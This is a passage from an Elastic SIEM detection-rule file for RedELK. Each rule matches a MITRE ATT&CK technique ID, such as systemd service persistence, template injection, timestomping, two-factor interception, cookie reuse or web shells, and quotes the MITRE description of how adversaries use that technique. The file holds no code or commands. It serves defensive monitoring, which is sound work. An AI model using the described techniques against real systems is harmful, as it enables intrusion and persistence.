what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\nExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.\nExecReload directive covers when a service restarts.\nExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.[3][4][5][6]\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.[7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1501","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1501] Systemd Service","query":"threat.technique.id: T1501","references":["https://attack.mitre.org/techniques/T1501","https://attack.mitre.org/techniques/T1543/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1501","name":"Systemd Service","id":"T1501"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories. The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. [1]\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1080","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1080] Taint Shared Content","query":"threat.technique.id: T1080","references":["https://attack.mitre.org/techniques/T1080"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1080","name":"Taint Shared Content","id":"T1080"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. [1]\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. [2] These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. [3] Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. [4]\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. [5] [6] [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1221","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1221] Template Injection","query":"threat.technique.id: T1221","references":["https://attack.mitre.org/techniques/T1221"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1221","name":"Template Injection","id":"T1221"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1072","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1072] Third-party Software","query":"threat.technique.id: T1072","references":["https://attack.mitre.org/techniques/T1072"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1072","name":"Third-party Software","id":"T1072"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1072","name":"Third-party Software","id":"T1072"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. [1] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. [2]\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. [2] The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. [2]\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1209","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1209] Time Providers","query":"threat.technique.id: T1209","references":["https://attack.mitre.org/techniques/T1209","https://attack.mitre.org/techniques/T1547/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1209","name":"Time Providers","id":"T1209"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1537","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1537] Transfer Data to Cloud Account","query":"threat.technique.id: T1537","references":["https://attack.mitre.org/techniques/T1537"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1537","name":"Transfer Data to Cloud Account","id":"T1537"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\nTimestomping may be used along with file name Masquerading to hide malware and tools.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1099","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1099] Timestomp","query":"threat.technique.id: T1099","references":["https://attack.mitre.org/techniques/T1099","https://attack.mitre.org/techniques/T1070/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1099","name":"Timestomp","id":"T1099"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.[1][2] By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1493","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1493] Transmitted Data Manipulation","query":"threat.technique.id: T1493","references":["https://attack.mitre.org/techniques/T1493","https://attack.mitre.org/techniques/T1565/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1493","name":"Transmitted Data Manipulation","id":"T1493"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.[1][2][3][4] These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1127","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1127] Trusted Developer Utilities","query":"threat.technique.id: T1127","references":["https://attack.mitre.org/techniques/T1127"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1127","name":"Trusted Developer Utilities","id":"T1127"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1127","name":"Trusted Developer Utilities","id":"T1127"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1154","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1154] Trap","query":"threat.technique.id: T1154","references":["https://attack.mitre.org/techniques/T1154","https://attack.mitre.org/techniques/T1546/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1154","name":"Trap","id":"T1154"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1154","name":"Trap","id":"T1154"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1199","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1199] Trusted Relationship","query":"threat.technique.id: T1199","references":["https://attack.mitre.org/techniques/T1199"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1199","name":"Trusted Relationship","id":"T1199"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. [1]\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). [2]\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1111","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1111] Two-Factor Authentication Interception","query":"threat.technique.id: T1111","references":["https://attack.mitre.org/techniques/T1111"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1111","name":"Two-Factor Authentication Interception","id":"T1111"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. For example, AWS GuardDuty is not supported in every region.[1]\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1535","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1535] Unused/Unsupported Cloud Regions","query":"threat.technique.id: T1535","references":["https://attack.mitre.org/techniques/T1535"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1535","name":"Unused/Unsupported Cloud Regions","id":"T1535"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.\nWhile User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1204","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1204] User Execution","query":"threat.technique.id: T1204","references":["https://attack.mitre.org/techniques/T1204"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1204","name":"User Execution","id":"T1204"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088[1] or port 587[2] as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1065","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1065] Uncommonly Used Port","query":"threat.technique.id: T1065","references":["https://attack.mitre.org/techniques/T1065","https://attack.mitre.org/techniques/T1571"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1065","name":"Uncommonly Used Port","id":"T1065"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1078","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1078] Valid Accounts","query":"threat.technique.id: T1078","references":["https://attack.mitre.org/techniques/T1078"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1078","name":"Valid Accounts","id":"T1078"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1125","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1125] Video Capture","query":"threat.technique.id: T1125","references":["https://attack.mitre.org/techniques/T1125"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1125","name":"Video Capture","id":"T1125"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\nAdversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1497","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1497] Virtualization/Sandbox Evasion","query":"threat.technique.id: T1497","references":["https://attack.mitre.org/techniques/T1497"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1497","name":"Virtualization/Sandbox Evasion","id":"T1497"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1497","name":"Virtualization/Sandbox Evasion","id":"T1497"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1102","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1102] Web Service","query":"threat.technique.id: T1102","references":["https://attack.mitre.org/techniques/T1102"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1102","name":"Web Service","id":"T1102"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1102","name":"Web Service","id":"T1102"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.[1]\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through Steal Web Session Cookie, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1506","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1506] Web Session Cookie","query":"threat.technique.id: T1506","references":["https://attack.mitre.org/techniques/T1506","https://attack.mitre.org/techniques/T1550/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1506","name":"Web Session Cookie","id":"T1506"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1506","name":"Web Session Cookie","id":"T1506"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: China Chopper 